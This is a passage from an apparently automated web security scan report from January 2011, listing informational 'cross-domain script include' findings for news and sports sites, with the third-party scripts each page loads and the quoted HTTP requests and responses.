X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://progolftalk.nbcsports.com/xmlrpc.php
Link: <http://wp.me/p1aWkj-A3>; rel=shortlink
X-nananana: Batcache
Content-Length: 119558

<!DOCTYPE html>
<html dir="ltr" lang="en">

<head>
   <meta http-equiv="conten
...[SNIP]...
<meta name="keywords" content="tiger woods, pga tour, farmers insurance open, jhonattan vegas" />

       <script src='http://wordpress.com/remote-login.php?action=js&host=progolftalk.nbcsports.com&id=17383827&t=1296410883&back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftiger-woods-shoots-74-in-farmers-third-round%2Frelated' type="text/javascript"></script>
...[SNIP]...
</style><script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1286321811g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1286321811g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1286321811g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1286321811g&ver=1.3'></script>
<script type='text/javascript' src='http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/comment-reply.js?m=1231878779g&ver=20090102'></script>
...[SNIP]...

   <script src="http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1286321811g&ver=1.3'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1286579676g&ver=1.3"></script>
...[SNIP]...

   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1286579676g&ver=1.3"></script>
...[SNIP]...

<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

23.279. http://progolftalk.nbcsports.com/2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://progolftalk.nbcsports.com
Path:	/2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://edge.quantserve.com/quant.js
http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js?ver=1.3
http://s.gravatar.com/js/gprofiles.js?o&ver=MU
http://s.stats.wordpress.com/w.js?19
http://s0.wp.com/wp-includes/js/comment-reply.js?m=1286590284g&ver=20090102
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1286590400g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1286590400g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1286590400g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1286590400g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1286590400g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1286590400g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1286590400g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&ver=1.3
http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4
http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110
http://wordpress.com/remote-login.php?action=js&host=progolftalk.nbcsports.com&id=17383827&t=1296410700&back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back%2Frelated
http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3

Request

GET /2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related HTTP/1.1
Host: progolftalk.nbcsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 18:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Sun, 30 Jan 2011 18:05:01 +0000
Cache-Control: max-age=113, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://progolftalk.nbcsports.com/xmlrpc.php
Link: <http://wp.me/p1aWkj-Ab>; rel=shortlink
X-nananana: Batcache
Content-Length: 122746

<!DOCTYPE html>
<html dir="ltr" lang="en">

<head>
   <meta http-equiv="cont
...[SNIP]...
<meta name="keywords" content="pga tour, farmers insurance open, torrey pines, phil mickelson, bill haas, bubba watson, hunter mahan, tiger woods, anthony kim" />

       <script src='http://wordpress.com/remote-login.php?action=js&host=progolftalk.nbcsports.com&id=17383827&t=1296410700&back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back%2Frelated' type="text/javascript"></script>
...[SNIP]...
</style><script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1286590400g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1286590400g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1286590400g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1286590400g&ver=1.3'></script>
<script type='text/javascript' src='http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/comment-reply.js?m=1286590284g&ver=20090102'></script>
...[SNIP]...

   <script src="http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1286590400g&ver=1.3'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1286590400g&ver=1.3"></script>
...[SNIP]...

   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1286590400g&ver=1.3"></script>
...[SNIP]...

<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

23.280. http://progolftalk.nbcsports.com/2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://progolftalk.nbcsports.com
Path:	/2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://edge.quantserve.com/quant.js
http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js?ver=1.3
http://s.gravatar.com/js/gprofiles.js?o&ver=MU
http://s.stats.wordpress.com/w.js?19
http://s0.wp.com/wp-includes/js/comment-reply.js?m=1293299746g&ver=20090102
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1293300010g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1293300010g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1293300010g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1293300010g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1293300010g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1293300010g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1293300010g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&ver=1.3
http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1293299738g&ver=1.4.4
http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110
http://wordpress.com/remote-login.php?action=js&host=progolftalk.nbcsports.com&id=17383827&t=1296353609&back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back%2Frelated
http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 02:17:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Sun, 30 Jan 2011 02:13:30 +0000
Cache-Control: max-age=32, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://progolftalk.nbcsports.com/xmlrpc.php
Link: <http://wp.me/p1aWkj-Ab>; rel=shortlink
X-nananana: Batcache
Content-Length: 122690

<!DOCTYPE html>
<html dir="ltr" lang="en">

<head>
   <meta http-equiv="conte
...[SNIP]...
<meta name="keywords" content="pga tour, farmers insurance open, torrey pines, phil mickelson, bill haas, bubba watson, hunter mahan, tiger woods, anthony kim" />

       <script src='http://wordpress.com/remote-login.php?action=js&host=progolftalk.nbcsports.com&id=17383827&t=1296353609&back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back%2Frelated' type="text/javascript"></script>
...[SNIP]...
</style><script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1293299738g&ver=1.4.4'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1293300010g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1293300010g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1293300010g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1293300010g&ver=1.3'></script>
<script type='text/javascript' src='http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/comment-reply.js?m=1293299746g&ver=20090102'></script>
...[SNIP]...

   <script src="http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1293300010g&ver=1.3'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1293300010g&ver=1.3"></script>
...[SNIP]...

   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1293300010g&ver=1.3"></script>
...[SNIP]...

<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

23.281. http://realestate.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-redacted/js/embed.js

Request

GET / HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.282. http://realestate.redacted/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://img.widgets.video.s-redacted/js/embed.js
http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js

Request

GET /article.aspx?cp-documentid=26575425&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.283. http://realestate.redacted/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/slideshow.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js

Request

GET /slideshow.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.284. http://recruiting.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js

Request

GET / HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=153805115.1296350458.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=153805115.697096863.1296350458.1296350458.1296350458.1; SessionBrandId=0; __utmc=153805115; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=153805115.1.10.1296350458;

Response

23.285. http://recruiting.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js

Request

GET /a.z HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 29 Jan 2011 23:50:44 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:00:44 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.286. http://redtape.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redtape.msnbc.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://static.typepad.com/.shared:v20110127.01-0-ga90527b:typepad:en_us/js/yui/yahoo-dom-event.js,/js/sixatrack-loader.js
http://www.msnbc.redacted/js/s_code_remote.js
http://www.msnbc.redacted/js/std.js

Request

GET / HTTP/1.1
Host: redtape.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web020
X-Webserver: oak-tp-web020
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/html; charset=utf-8
Content-Length: 39293
Date: Sun, 30 Jan 2011 02:18:20 GMT
X-Varnish: 2755478365
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script type="text/javascript" src="http://static.typepad.com/.shared:v20110127.01-0-ga90527b:typepad:en_us/js/yui/yahoo-dom-event.js,/js/sixatrack-loader.js"></script>
...[SNIP]...
<div id="nav">

<script language="JavaScript" src="http://www.msnbc.msn.com/js/std.js"></script>
...[SNIP]...
</script>
   <script language="JavaScript" src="http://www.msnbc.msn.com/js/s_code_remote.js"></script>
...[SNIP]...
<li><script language="javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js" type="text/javascript" ></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.287. http://redtape.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redtape.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: redtape.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:18:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3df9ab73640c1ed44c1858b2a3c651a7; expires=Sat, 25-Jan-2031 02:18:21 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 65847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.288. http://rive.rs/projects/tumblr-tag-clouds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rive.rs
Path:	/projects/tumblr-tag-clouds

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /projects/tumblr-tag-clouds HTTP/1.1
Host: rive.rs
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
ETag: "b7894ef62577238e8cd33a6c0c66fdc7"
X-Runtime: 5
Content-Length: 5660
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en-US' xml:lang='en-US' xmlns='http://www.w3.org/1999/xhtml'>
<hea
...[SNIP]...

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

23.289. http://rss.scout.com/rss.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rss.scout.com
Path:	/rss.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

GET /rss.aspx?s=143&p=18 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.290. http://science.slashdot.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://science.slashdot.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.fsdn.com/sd/all-minified.js?T_2_5_0_306d
http://jlinks.industrybrains.com/jsct?sid=941&ct=SLASHDOT_ROS&num=3&layt=300x250IMGAD&fmt=simp

Request

GET / HTTP/1.1
Host: science.slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
SLASH_LOG_DATA: shtml
X-Powered-By: Slash 2.005001
X-Bender: In the event of an emergency, my ass can be used as a flotation device.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 82642
Date: Sun, 30 Jan 2011 02:18:39 GMT
X-Varnish: 257579542
Age: 1
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<script id="before-content" type="text/javascript">
var pageload = {
   pagemark: '490080280767515490',
   before_content: (new Date).getTime()
};
function pageload
...[SNIP]...


<script src="//a.fsdn.com/sd/all-minified.js?T_2_5_0_306d" type="text/javascript"></script>
...[SNIP]...
<div class="advertisement marchex railad" style="padding-top:75px">
           <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=941&ct=SLASHDOT_ROS&num=3&layt=300x250IMGAD&fmt=simp"></script>
...[SNIP]...

23.291. http://scouthoops.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scouthoops.scout.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js

Request

GET / HTTP/1.1
Host: scouthoops.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:37:08 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:47:08 GMT
Last-Modified: Sat, 29 Jan 2011 23:52:20 GMT
ETag: "1CBC00F91011200"
Content-Type: text/html
Content-Length: 111693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.292. https://secure.bundle.com/msn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bundle.com
Path:	/msn

Issue detail

The response dynamically includes the following script from another domain:

https://secure.footprint.net/bstmsn/br/sc/js/jquery/jquery-1.4.2.min.js

Request

GET /msn HTTP/1.1
Host: secure.bundle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app02
X-Bundle-Server: prod-web01
Date: Sun, 30 Jan 2011 01:37:09 GMT
Content-Length: 26954
Connection: close
Cache-Control: private, no-store, max-age=0
Cache-Control: private, no-store, max-age=0
Expires: Sat, 29 Jan 2011 09:21:30 GMT
Expires: Sat, 29 Jan 2011 09:21:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

23.293. https://secure.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/a.z

Issue detail

